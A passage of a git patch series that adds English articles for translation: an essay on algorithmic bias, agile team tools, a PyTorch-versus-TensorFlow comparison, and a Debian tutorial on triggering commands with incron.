+[11]:https://opensource.com/resources/what-open-source
+[12]:https://hbr.org/2013/01/yes-you-can-make-money-with-op
+[13]:https://hbr.org/2012/10/open-sourcing-may-be-worth
+[14]:https://github.com/MunGell/awesome-for-beginners
+[15]:https://opensource.com/life/16/1/6-beginner-open-source
From ab5b582752c21c81dd6460e95b5e2b9734335a54 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:43:14 +0800
Subject: [PATCH 269/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20AI=20and=20machin?=
=?UTF-8?q?e=20learning=20bias=20has=20dangerous=20implications?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...earning bias has dangerous implications.md | 81 +++++++++++++++++++
1 file changed, 81 insertions(+)
create mode 100644 sources/tech/20180111 AI and machine learning bias has dangerous implications.md
diff --git a/sources/tech/20180111 AI and machine learning bias has dangerous implications.md b/sources/tech/20180111 AI and machine learning bias has dangerous implications.md
new file mode 100644
index 0000000000..7a83ebb3a2
--- /dev/null
+++ b/sources/tech/20180111 AI and machine learning bias has dangerous implications.md
@@ -0,0 +1,81 @@
+AI and machine learning bias has dangerous implications
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/LAW_goodbadugly.png?itok=ZxaimUWU)
+
+Image by : opensource.com
+
+Algorithms are everywhere in our world, and so is bias. From social media news feeds to streaming service recommendations to online shopping, computer algorithms--specifically, machine learning algorithms--have permeated our day-to-day world. As for bias, we need only examine the 2016 American election to understand how deeply--both implicitly and explicitly--it permeates our society as well.
+
+What's often overlooked, however, is the intersection between these two: bias in computer algorithms themselves.
+
+Contrary to what many of us might think, technology is not objective. AI algorithms and their decision-making processes are directly shaped by those who build them--what code they write, what data they use to "[train][1]" the machine learning models, and how they [stress-test][2] the models after they're finished. This means that the programmers' values, biases, and human flaws are reflected in the software. If I fed an image-recognition algorithm the faces of only white researchers in my lab, for instance, it [wouldn't recognize non-white faces as human][3]. Such a conclusion isn't the result of a "stupid" or "unsophisticated" AI, but to a bias in training data: a lack of diverse faces. This has dangerous consequences.
+
+There's no shortage of examples. [State court systems][4] across the country use "black box" algorithms to recommend prison sentences for convicts. [These algorithms are biased][5] against black individuals because of the data that trained them--so they recommend longer sentences as a result, thus perpetuating existing racial disparities in prisons. All this happens under the guise of objective, "scientific" decision-making.
+
+The United States federal government uses machine-learning algorithms to calculate welfare payouts and other types of subsidies. But [information on these algorithms][6], such as their creators and their training data, is extremely difficult to find--which increases the risk of public officials operating under bias and meting out systematically unfair payments.
+
+This list goes on. From Facebook news algorithms to medical care systems to police body cameras, we as a society are at great risk of inserting our biases--racism, sexism, xenophobia, socioeconomic discrimination, confirmation bias, and more--into machines that will be mass-produced and mass-distributed, operating under the veil of perceived technological objectivity.
+
+This must stop.
+
+While we should by no means halt research and development on artificial intelligence, we need to slow its development such that we tread carefully. The danger of algorithmic bias is already too great.
+
+## How can we fight algorithmic bias?
+
+One of the best ways to fight algorithmic bias is by vetting the training data fed into machine learning models themselves. As [researchers at Microsoft][2] point out, this can take many forms.
+
+The data itself might have a skewed distribution--for instance, programmers may have more data about United States-born citizens than immigrants, and about rich men than poor women. Such imbalances will cause an AI to make improper conclusions about how our society is in fact represented--i.e., that most Americans are wealthy white businessmen--simply because of the way machine-learning models make statistical correlations.
+
+It's also possible, even if men and women are equally represented in training data, that the representations themselves result in prejudiced understandings of humanity. For instance, if all the pictures of "male occupation" are of CEOs and all those of "female occupation" are of secretaries (even if more CEOs are in fact male than female), the AI could conclude that women are inherently not meant to be CEOs.
+
+We can imagine similar issues, for example, with law enforcement AIs that examine representations of criminality in the media, which dozens of studies have shown to be [egregiously slanted][7] towards black and Latino citizens.
+
+Bias in training data can take many other forms as well--unfortunately, more than can be adequately covered here. Nonetheless, training data is just one form of vetting; it's also important that AI models are "stress-tested" after they're completed to seek out prejudice.
+
+If we show an Indian face to our camera, is it appropriately recognized? Is our AI less likely to recommend a job candidate from an inner city than a candidate from the suburbs, even if they're equally qualified? How does our terrorism algorithm respond to intelligence on a white domestic terrorist compared to an Iraqi? Can our ER camera pull up medical records of children?
+
+These are obviously difficult issues to resolve in the data itself, but we can begin to identify and address them through comprehensive testing.
+
+## Why is open source well-suited for this task?
+
+Both open source technology and open source methodologies have extreme potential to help in this fight against algorithmic bias.
+
+Modern artificial intelligence is dominated by open source software, from TensorFlow to IBM Watson to packages like [scikit-learn][8]. The open source community has already proven extremely effective in developing robust and rigorously tested machine-learning tools, so it follows that the same community could effectively build anti-bias tests into that same software.
+
+Debugging tools like [DeepXplore][9], out of Columbia and Lehigh Universities, for example, make the AI stress-testing process extensive yet also easy to navigate. This and other projects, such as work being done at [MIT's Computer Science and Artificial Intelligence Lab][10], develop the agile and rapid prototyping the open source community should adopt.
+
+Open source technology has also proven to be extremely effective for vetting and sorting large sets of data. Nothing should make this more obvious than the domination of open source tools in the data analysis market (Weka, Rapid Miner, etc.). Tools for identifying data bias should be designed by the open source community, and those techniques should also be applied to the plethora of open training data sets already published on sites like [Kaggle][11].
+
+The open source methodology itself is also well-suited for designing processes to fight bias. Making conversations about software open, democratized, and in tune with social good are pivotal to combating an issue that is partly caused by the very opposite--closed conversations, private software development, and undemocratized decision-making. If online communities, corporations, and academics can adopt these open source characteristics when approaching machine learning, fighting algorithmic bias should become easier.
+
+## How can we all get involved?
+
+Education is extremely important. We all know people who may be unaware of algorithmic bias but who care about its implications--for law, social justice, public policy, and more. It's critical to talk to those people and explain both how the bias is formed and why it matters because the only way to get these conversations started is to start them ourselves.
+
+For those of us who work with artificial intelligence in some capacity--as developers, on the policy side, through academic research, or in other capacities--these conversations are even more important. Those who are designing the artificial intelligence of tomorrow need to understand the extreme dangers that bias presents today; clearly, integrating anti-bias processes into software design depends on this very awareness.
+
+Finally, we should all build and strengthen open source community around ethical AI. Whether that means contributing to software tools, stress-testing machine learning models, or sifting through gigabytes of training data, it's time we leverage the power of open source methodology to combat one of the greatest threats of our digital age.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/how-open-source-can-fight-algorithmic-bias
+
+作者:[Justin Sherman][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/justinsherman
+[1]:https://www.crowdflower.com/what-is-training-data/
+[2]:https://medium.com/microsoft-design/how-to-recognize-exclusion-in-ai-ec2d6d89f850
+[3]:https://www.ted.com/talks/joy_buolamwini_how_i_m_fighting_bias_in_algorithms
+[4]:https://www.wired.com/2017/04/courts-using-ai-sentence-criminals-must-stop-now/
+[5]:https://www.propublica.org/article/machine-bias-risk-assessments-in-criminal-sentencing
+[6]:https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3012499
+[7]:https://www.hivlawandpolicy.org/sites/default/files/Race%20and%20Punishment-%20Racial%20Perceptions%20of%20Crime%20and%20Support%20for%20Punitive%20Policies%20%282014%29.pdf
+[8]:http://scikit-learn.org/stable/
+[9]:https://arxiv.org/pdf/1705.06640.pdf
+[10]:https://www.csail.mit.edu/research/understandable-deep-networks
+[11]:https://www.kaggle.com/datasets
From a210efaaecabd55a7780d3c97ab1bdd720be805a Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:44:07 +0800
Subject: [PATCH 270/371] add done: 20180111 AI and machine learning bias has
dangerous implications.md
---
...111 AI and machine learning bias has dangerous implications.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180111 AI and machine learning bias has dangerous implications.md (100%)
diff --git a/sources/tech/20180111 AI and machine learning bias has dangerous implications.md b/sources/talk/20180111 AI and machine learning bias has dangerous implications.md
similarity index 100%
rename from sources/tech/20180111 AI and machine learning bias has dangerous implications.md
rename to sources/talk/20180111 AI and machine learning bias has dangerous implications.md
From b2896a81db43d3a66f9442784caebd971f32a810 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:50:21 +0800
Subject: [PATCH 271/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=208=20simple=20ways?=
=?UTF-8?q?=20to=20promote=20team=20communication?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...mple ways to promote team communication.md | 75 +++++++++++++++++++
1 file changed, 75 insertions(+)
create mode 100644 sources/tech/20180110 8 simple ways to promote team communication.md
diff --git a/sources/tech/20180110 8 simple ways to promote team communication.md b/sources/tech/20180110 8 simple ways to promote team communication.md
new file mode 100644
index 0000000000..dc4ee37f72
--- /dev/null
+++ b/sources/tech/20180110 8 simple ways to promote team communication.md
@@ -0,0 +1,75 @@
+8 simple ways to promote team communication
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/world_remote_teams.png?itok=Wk1yBFv6)
+
+Image by : opensource.com
+
+You might be familiar with the expression: So many tools, so little time. In order to try to save you some time, I've outlined some of my favorite tools that help agile teams work better. If you are an agilist, chances are you're aware of similar tools, but I'm specifically narrowing down the list to tools that appeal to open source enthusiasts.
+
+**Caution!** These tools are a little different than what you may be expecting. There are no project management apps --there is a [great article][1] on that already--so there are no checklists, no integrations with GitHub, just simple ways to organize your thoughts and promote team communication.
+
+### Building teams
+
+In an industry where most people are used to giving and receiving negative feedback, it's rare to share positive feedback with coworkers. It's not surprising--while some enjoy giving compliments, many people struggle with telling someone "way to go" or "couldn't have done this without you." But it never hurts to tell someone they're doing a good job, and it often influences people to work better for the team. Here are two tools that help you share kudos with your coworkers.
+
+ * [Management 3.0][2] has a treasure trove of [free resources][3] for building teams. One tool we find compelling is the concept of Feedback Wraps (and not just because it inspires us to think about burritos). [Feedback Wraps][4] is a six-step process to come up with effective feedback for anyone; you might think it is designed for negative feedback, but we find it's perfect for sharing positive comments.
+ * [Happiness Packets][5] provides a way to share anonymous positive feedback with people in the open source community. It is especially useful for those who aren't comfortable with such a personal interaction or don't know the people they want to reward. Happiness Packets offers a [public archive][6] of comments (from people who agree to share them), so you can look through and get warm fuzzies and ideas on what to say to others if you are struggling to find your own words. As a bonus, its code of conduct process prevents anyone from sending nasty messages.
+
+
+
+### Understanding why
+
+Definitions are hard. In the agile world, keys to success include defining personas, the purpose of a feature, or the product vision, and ensuring the entire agile team understands why they are doing the work they are doing. We are a little disappointed by the limited number of open source tools available that help product managers and owners do their jobs.
+
+One that we highly respect and use frequently to teach teams at Red Hat is the Product Vision Board. It comes from product management expert Roman Pichler, who offers numerous [tools and templates][7] to help teams develop a better understanding of "the why." (Note that you will need to provide your email address to download these files.)
+
+ * The [Product Vision Board][8] template guides teams by asking simple but effective questions to prompt them to think about what they are doing before they think about how they are going to do it.
+ * We also like Roman's [Product Management Test][9]. This is a simple and quick web form that guides teams through the traditional role of a product manager and helps uncover where there may be gaps. We recommend that product management teams periodically complete this test to reassess where they fall.
+
+
+
+### Visualizing work
+
+Have you ever been working on a huge assignment, and the steps to complete it are all jumbled up in your head, out of order, and chaotic? Yeah, us, too. Mind mapping is a technique that helps you visually organize all the thoughts in your head. You don't need to start out understanding how everything fits together--you just need your brain, a whiteboard (or a mind-mapping tool), and some time to think.
+
+ * Our favorite open source tool in this space is [Xmind3][10]. It's available for multiple platforms (Linux, MacOS, and Windows), so you can easily share files back and forth with other people. If you need to have the latest & greatest, there is an [updated version][11], which you can download for free if you don't mind sharing your email.
+ * If you like more variety in your life, Eduard Lucena offers [three additional options][12] in Fedora Magazine. You can find information about these tools' availability in Fedora and other distributions on their project pages.
+
+ * [Labyrinth][13]
+ * [View Your Mind][14]
+ * [FreeMind][15]
+
+
+
+As we wrote at the start, there are many similar tools out there; if you have a favorite open source tool that helps agile teams work better, please share it in the comments.
+
+### About the author
+Jen Krieger - Jen Krieger is Chief Agile Architect at Red Hat. Most of her 20+ year career has been in software development representing many roles throughout the waterfall and agile lifecycles. At Red Hat, she led a department-wide DevOps movement focusing on CI/CD best practices. Most recently, she worked with with the Project Atomic & OpenShift teams. Now Jen is guiding teams across the company into agility in a way that respects and supports Red Hat's commitment to Open Source.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/foss-tools-agile-teams
+
+作者:[Jen Krieger][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/jkrieger
+[1]:https://opensource.com/business/16/3/top-project-management-tools-2016
+[2]:https://management30.com/
+[3]:https://management30.com/leadership-resource-hub/
+[4]:https://management30.com/en/practice/feedback-wraps/
+[5]:https://happinesspackets.io/
+[6]:https://www.happinesspackets.io/archive/
+[7]:http://www.romanpichler.com/tools/
+[8]:http://www.romanpichler.com/tools/vision-board/
+[9]:http://www.romanpichler.com/tools/romans-product-management-test/
+[10]:https://sourceforge.net/projects/xmind3/?source=recommended
+[11]:http://www.xmind.net/
+[12]:https://fedoramagazine.org/three-mind-mapping-tools-fedora/
+[13]:https://people.gnome.org/~dscorgie/labyrinth.html
+[14]:http://www.insilmaril.de/vym/
+[15]:http://freemind.sourceforge.net/wiki/index.php/Main_Page
From c97ed434d04a23eae3506b73f1b6bb1c202ba5b7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:51:43 +0800
Subject: [PATCH 272/371] add done: 20180110 8 simple ways to promote team
communication.md
---
.../20180110 8 simple ways to promote team communication.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180110 8 simple ways to promote team communication.md (100%)
diff --git a/sources/tech/20180110 8 simple ways to promote team communication.md b/sources/talk/20180110 8 simple ways to promote team communication.md
similarity index 100%
rename from sources/tech/20180110 8 simple ways to promote team communication.md
rename to sources/talk/20180110 8 simple ways to promote team communication.md
From c5fadf6f144b5e92eb0450f6be10f78a94da778d Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:57:13 +0800
Subject: [PATCH 273/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Deep=20learning?=
=?UTF-8?q?=20wars:=20Facebook-backed=20PyTorch=20vs=20Google's=20TensorFl?=
=?UTF-8?q?ow?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...k-backed PyTorch vs Google-s TensorFlow.md | 76 +++++++++++++++++++
1 file changed, 76 insertions(+)
create mode 100644 sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
diff --git a/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md b/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
new file mode 100644
index 0000000000..5b0014246c
--- /dev/null
+++ b/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
@@ -0,0 +1,76 @@
+Deep learning wars: Facebook-backed PyTorch vs Google's TensorFlow
+======
+The rapid rise of tools and techniques in Artificial Intelligence and Machine learning of late has been astounding. Deep Learning, or "Machine learning on steroids" as some say, is one area where data scientists and machine learning experts are spoilt for choice in terms of the libraries and frameworks available. A lot of these frameworks are Python-based, as Python is a more general-purpose and a relatively easier language to work with. [Theano][1], [Keras][2] [TensorFlow][3] are a few of the popular deep learning libraries built on Python, developed with an aim to make the life of machine learning experts easier.
+
+Google's TensorFlow is a widely used machine learning and deep learning framework. Open sourced in 2015 and backed by a huge community of machine learning experts, TensorFlow has quickly grown to be THE framework of choice by many organizations for their machine learning and deep learning needs. PyTorch, on the other hand, a recently developed Python package by Facebook for training neural networks is adapted from the Lua-based deep learning library Torch. PyTorch is one of the few available DL frameworks that uses tape-based autograd system to allow building dynamic neural networks in a fast and flexible manner.
+
+In this article, we pit PyTorch against TensorFlow and compare different aspects where one edges the other out.
+
+Let's get started!
+
+### What programming languages support PyTorch and TensorFlow?
+
+Although primarily written in C++ and CUDA, Tensorflow contains a Python API sitting over the core engine, making it easier for Pythonistas to use. Additional APIs for C++, Haskell, Java, Go, and Rust are also included which means developers can code in their preferred language.
+
+Although PyTorch is a Python package, there's provision for you to code using the basic C/ C++ languages using the APIs provided. If you are comfortable using Lua programming language, you can code neural network models in PyTorch using the Torch API.
+
+### How easy are PyTorch and TensorFlow to use?
+
+TensorFlow can be a bit complex to use if used as a standalone framework, and can pose some difficulty in training Deep Learning models. To reduce this complexity, one can use the Keras wrapper which sits on top of TensorFlow's complex engine and simplifies the development and training of deep learning models. TensorFlow also supports [Distributed training][4], which PyTorch currently doesn't. Due to the inclusion of Python API, TensorFlow is also production-ready i.e., it can be used to train and deploy enterprise-level deep learning models.
+
+PyTorch was rewritten in Python due to the complexities of Torch. This makes PyTorch more native to developers. It has an easy to use framework that provides maximum flexibility and speed. It also allows quick changes within the code during training without hampering its performance. If you already have some experience with deep learning and have used Torch before, you will like PyTorch even more, because of its speed, efficiency, and ease of use. PyTorch includes custom-made GPU allocator, which makes deep learning models highly memory efficient. Due to this, training large deep learning models becomes easier. Hence, large organizations such as Facebook, Twitter, Salesforce, and many more are embracing Pytorch.
+
+### Training Deep Learning models with PyTorch and TensorFlow
+
+Both TensorFlow and PyTorch are used to build and train Neural Network models.
+
+TensorFlow works on SCG (Static Computational Graph) that includes defining the graph statically before the model starts execution. However, once the execution starts the only way to tweak changes within the model is using [tf.session and tf.placeholder tensors][5].
+
+PyTorch is well suited to train RNNs( Recursive Neural Networks) as they run faster in [PyTorch ][6]than in TensorFlow. It works on DCG (Dynamic Computational Graph) and one can define and make changes within the model on the go. In a DCG, each block can be debugged separately, which makes training of neural networks easier.
+
+TensorFlow has recently come up with TensorFlow Fold, a library designed to create TensorFlow models that works on structured data. Like PyTorch, it implements the DCGs and gives massive computational speeds of up to 10x on CPU and more than 100x on GPU! With the help of [Dynamic Batching][7], you can now implement deep learning models which vary in size as well as structure.
+
+### Comparing GPU and CPU optimizations
+
+TensorFlow has faster compile times than PyTorch and provides flexibility for building real-world applications. It can run on literally any kind of processor from a CPU, GPU, TPU, mobile devices, to a Raspberry Pi (IoT Devices).
+
+PyTorch, on the other hand, includes Tensor computations which can speed up deep neural network models upto [50x or more][8] using GPUs. These tensors can dwell on CPU or GPU. Both CPU and GPU are written as independent libraries; making PyTorch efficient to use, irrespective of the Neural Network size.
+
+### Community Support
+
+TensorFlow is one of the most popular Deep Learning frameworks today, and with this comes a huge community support. It has great documentation, and an eloquent set of online tutorials. TensorFlow also includes numerous pre-trained models which are hosted and available on [github][9]. These models aid developers and researchers who are keen to work with TensorFlow with some ready-made material to save their time and efforts.
+
+PyTorch, on the other hand, has a relatively smaller community since it has been developed fairly recently. As compared to TensorFlow, the documentation isn't that great, and codes are not readily available. However, PyTorch does allow individuals to share their pre-trained models with others.
+
+### PyTorch and TensorFlow - A David & Goliath story
+
+As it stands, Tensorflow is clearly favoured and used more than PyTorch for a variety of reasons.
+
+Tensorflow is vast, experienced, and best suited for practical purposes. It is easily the obvious choice of most of the machine learning and deep learning experts because of the vast array of features it offers, and most importantly, its maturity in the market. It has a better community support along with multiple language APIs available. It has a good documentation and is production-ready due to the availability of ready-to-use code. Hence, it is better suited for someone who wants to get started with Deep Learning, or for organizations wanting to productize their Deep Learning models.
+
+Although PyTorch is relatively newer and has a smaller community, it is fast and efficient. In short, it gives you all the power of Torch wrapped in the usefulness and ease of Python. Because of its efficiency and speed, it is a good option to have for small, research based projects. As mentioned earlier, companies such as Facebook, Twitter, and many others are using Pytorch to train deep learning models. However, its adoption is yet to go mainstream. The potential is evident, PyTorch is just not ready yet to challenge the beast that is TensorFlow. However considering its growth, the day is not far when PyTorch is further optimized and offers more functionalities - to the point that it becomes the David to TensorFlow's Goliath.
+
+### Savia Lobo
+A Data science fanatic. Loves to be updated with the tech happenings around the globe. Loves singing and composing songs. Believes in putting the art in smart.
+
+
+--------------------------------------------------------------------------------
+
+via: https://datahub.packtpub.com/deep-learning/dl-wars-pytorch-vs-tensorflow/
+
+作者:[Savia Lobo][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://datahub.packtpub.com/author/savial/
+[1]:https://www.packtpub.com/web-development/deep-learning-theano
+[2]:https://www.packtpub.com/big-data-and-business-intelligence/deep-learning-keras
+[3]:https://www.packtpub.com/big-data-and-business-intelligence/deep-learning-tensorflow
+[4]:https://www.tensorflow.org/deploy/distributed
+[5]:https://www.tensorflow.org/versions/r0.12/get_started/basic_usage
+[6]:https://www.reddit.com/r/MachineLearning/comments/66rriz/d_rnns_are_much_faster_in_pytorch_than_tensorflow/
+[7]:https://arxiv.org/abs/1702.02181
+[8]:https://github.com/jcjohnson/pytorch-examples#pytorch-tensors
+[9]:https://github.com/tensorflow/models
From 957d6126a7b704b774398c52d414c21d3b8e7bb4 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:58:02 +0800
Subject: [PATCH 274/371] add done: 20170915 Deep learning wars-
Facebook-backed PyTorch vs Google-s TensorFlow.md
---
...arning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md (100%)
diff --git a/sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md b/sources/talk/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
similarity index 100%
rename from sources/tech/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
rename to sources/talk/20170915 Deep learning wars- Facebook-backed PyTorch vs Google-s TensorFlow.md
From 34ca8f6c88e1d49d038cc27b760426f4a114f481 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 22:06:36 +0800
Subject: [PATCH 275/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20trigge?=
=?UTF-8?q?r=20commands=20on=20File/Directory=20changes=20with=20Incron=20?=
=?UTF-8?q?on=20Debian?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Directory changes with Incron on Debian.md | 224 ++++++++++++++++++
1 file changed, 224 insertions(+)
create mode 100644 sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md
diff --git a/sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md b/sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md
new file mode 100644
index 0000000000..2c66a40d1e
--- /dev/null
+++ b/sources/tech/20180110 How to trigger commands on File-Directory changes with Incron on Debian.md
@@ -0,0 +1,224 @@
+How to trigger commands on File/Directory changes with Incron on Debian
+======
+
+This guide shows how you can install and use **incron** on a Debian 9 (Stretch) system. Incron is similar to cron, but instead of running commands based on time, it can trigger commands when file or directory events occur (e.g. a file modification, changes of permissions, etc.).
+
+### 1 Prerequisites
+
+ * System administrator permissions (root login). All commands in this tutorial should be run as root user on the shell.
+ * I will use the editor "nano" to edit files. You may replace nano with an editor of your choice or install nano with "apt-get install nano" if it is not installed on your server.
+
+
+
+### 2 Installing Incron
+
+Incron is available in the Debian repository, so we install incron with the following apt command:
+
+```
+apt-get install incron
+```
+
+The installation process should be similar to the one in this screenshot.
+
+[![Installing Incron on Debian 9][1]][2]
+
+### 3 Using Incron
+
+Incron usage is very much like cron usage. You have the incrontab command that let's you list (-l), edit (-e), and remove (-r) incrontab entries.
+
+To learn more about it, see:
+
+```
+man incrontab
+```
+
+There you also find the following section:
+
+```
+If /etc/incron.allow exists only users listed here may use incron. Otherwise if /etc/incron.deny exists only users NOT listed here may use incron. If none of these files exists everyone is allowed to use incron. (Important note: This behavior is insecure and will be probably changed to be compatible with the style used by ISC Cron.) Location of these files can be changed in the configuration.
+```
+
+This means if we want to use incrontab as root, we must either delete /etc/incron.allow (which is unsafe because then every system user can use incrontab)...
+
+```
+rm -f /etc/incron.allow
+```
+
+... or add root to that file (recommended). Open the /etc/incron.allow file with nano:
+
+```
+nano /etc/incron.allow
+```
+
+And add the following line. Then save the file.
+```
+root
+```
+
+Before you do this, you will get error messages like this one when trying to use incrontab:
+
+```
+server1:~# incrontab -l
+user 'root' is not allowed to use incron
+```
+
+
+
+Afterwards it works:
+
+```
+server1:~# incrontab -l
+no table for root
+```
+
+
+
+We can use the command:
+
+```
+incrontab -e
+```
+
+To create incron jobs. Before we do this, we take a look at the incron man page:
+
+```
+man 5 incrontab
+```
+
+The man page explains the format of the crontabs. Basically, the format is as follows...
+
+```
+
+```
+
+...where can be a directory (meaning the directory and/or the files directly in that directory (not files in subdirectories of that directory!) are watched) or a file.
+
+ can be one of the following:
+
+IN_ACCESS File was accessed (read) (*)
+IN_ATTRIB Metadata changed (permissions, timestamps, extended attributes, etc.) (*)
+IN_CLOSE_WRITE File opened for writing was closed (*)
+IN_CLOSE_NOWRITE File not opened for writing was closed (*)
+IN_CREATE File/directory created in watched directory (*)
+IN_DELETE File/directory deleted from watched directory (*)
+IN_DELETE_SELF Watched file/directory was itself deleted
+IN_MODIFY File was modified (*)
+IN_MOVE_SELF Watched file/directory was itself moved
+IN_MOVED_FROM File moved out of watched directory (*)
+IN_MOVED_TO File moved into watched directory (*)
+IN_OPEN File was opened (*)
+
+When monitoring a directory, the events marked with an asterisk (*) above can occur for files in the directory, in which case the name field in the
+returned event data identifies the name of the file within the directory.
+
+The IN_ALL_EVENTS symbol is defined as a bit mask of all of the above events. Two additional convenience symbols are IN_MOVE, which is a combination of IN_MOVED_FROM and IN_MOVED_TO, and IN_CLOSE which combines IN_CLOSE_WRITE and IN_CLOSE_NOWRITE.
+
+The following further symbols can be specified in the mask:
+
+IN_DONT_FOLLOW Don't dereference pathname if it is a symbolic link
+IN_ONESHOT Monitor pathname for only one event
+IN_ONLYDIR Only watch pathname if it is a directory
+
+Additionally, there is a symbol which doesn't appear in the inotify symbol set. It is IN_NO_LOOP. This symbol disables monitoring events until the current one is completely handled (until its child process exits).
+
+ is the command that should be run when the event occurs. The following wildcards may be used inside the command specification:
+
+```
+$$ dollar sign
+#@ watched filesystem path (see above)
+$# event-related file name
+$% event flags (textually)
+$& event flags (numerically)
+```
+
+If you watch a directory, then [[email protected]][3] holds the directory path and $# the file that triggered the event. If you watch a file, then [[email protected]][3] holds the complete path to the file and $# is empty.
+
+If you need the wildcards but are not sure what they translate to, you can create an incron job like this. Open the incron incrontab:
+
+```
+incrontab -e
+```
+
+and add the following line:
+
+```
+/tmp/ IN_MODIFY echo "$$ $@ $# $% $&"
+```
+
+Then you create or modify a file in the /tmp directory and take a look at /var/log/syslog - this log shows when an incron job was triggered, if it succeeded or if there were errors, and what the actual command was that it executed (i.e., the wildcards are replaced with their real values).
+
+```
+tail /var/log/syslog
+```
+
+```
+...
+Jan 10 13:52:35 server1 incrond[1012]: (root) CMD (echo "$ /tmp .hello.txt.swp IN_MODIFY 2")
+Jan 10 13:52:36 server1 incrond[1012]: (root) CMD (echo "$ /tmp .hello.txt.swp IN_MODIFY 2")
+Jan 10 13:52:39 server1 incrond[1012]: (root) CMD (echo "$ /tmp hello.txt IN_MODIFY 2")
+Jan 10 13:52:39 server1 incrond[1012]: (root) CMD (echo "$ /tmp .hello.txt.swp IN_MODIFY 2")
+```
+
+In this example I've edited the file /tmp/hello.txt; as you see [[email protected]][3] translates to /tmp, $# to _hello.txt_ , $% to IN_CREATE, and $& to 256. I used an editor that created a temporary .txt.swp file which results in the additional lines in syslog.
+
+Now enough theory. Let's create our first incron jobs. I'd like to monitor the file /etc/apache2/apache2.conf and the directory /etc/apache2/vhosts/, and whenever there are changes, I want incron to restart Apache. This is how we do it:
+
+```
+incrontab -e
+```
+```
+/etc/apache2/apache2.conf IN_MODIFY /usr/sbin/service apache2 restart
+/etc/apache2/sites-available/ IN_MODIFY /usr/sbin/service apache2 restart
+```
+
+That's it. For test purposes, you can modify your Apache configuration and take a look at /var/log/syslog, and you should see that incron restarts Apache.
+
+**NOTE** : Do not do any action from within an incron job in a directory that you monitor to avoid loops. **Example:** When you monitor the /tmp directory for changes and each change triggers a script that writes a log file in /tmp, this will cause a loop and might bring your system to high load or even crash it.
+
+To list all defined incron jobs, you can run:
+
+```
+incrontab -l
+```
+
+```
+server1:~# incrontab -l
+/etc/apache2/apache2.conf IN_MODIFY /usr/sbin/service apache2 restart
+/etc/apache2/vhosts/ IN_MODIFY /usr/sbin/service apache2 restart
+```
+
+
+
+To delete all incron jobs of the current user, run:
+
+```
+incrontab -r
+```
+
+```
+server1:~# incrontab -r
+removing table for user 'root'
+table for user 'root' successfully removed
+```
+
+### 4 Links
+
+Debian http://www.debian.org
+Incron Software: http://inotify.aiken.cz/?section=incron&page=about&lang=en
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/trigger-commands-on-file-or-directory-changes-with-incron-on-debian-9/
+
+作者:[Till Brehm][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/trigger-commands-on-file-or-directory-changes-with-incron-on-debian-8/incron-debian-9.png
+[2]:https://www.howtoforge.com/images/trigger-commands-on-file-or-directory-changes-with-incron-on-debian-8/big/incron-debian-9.png
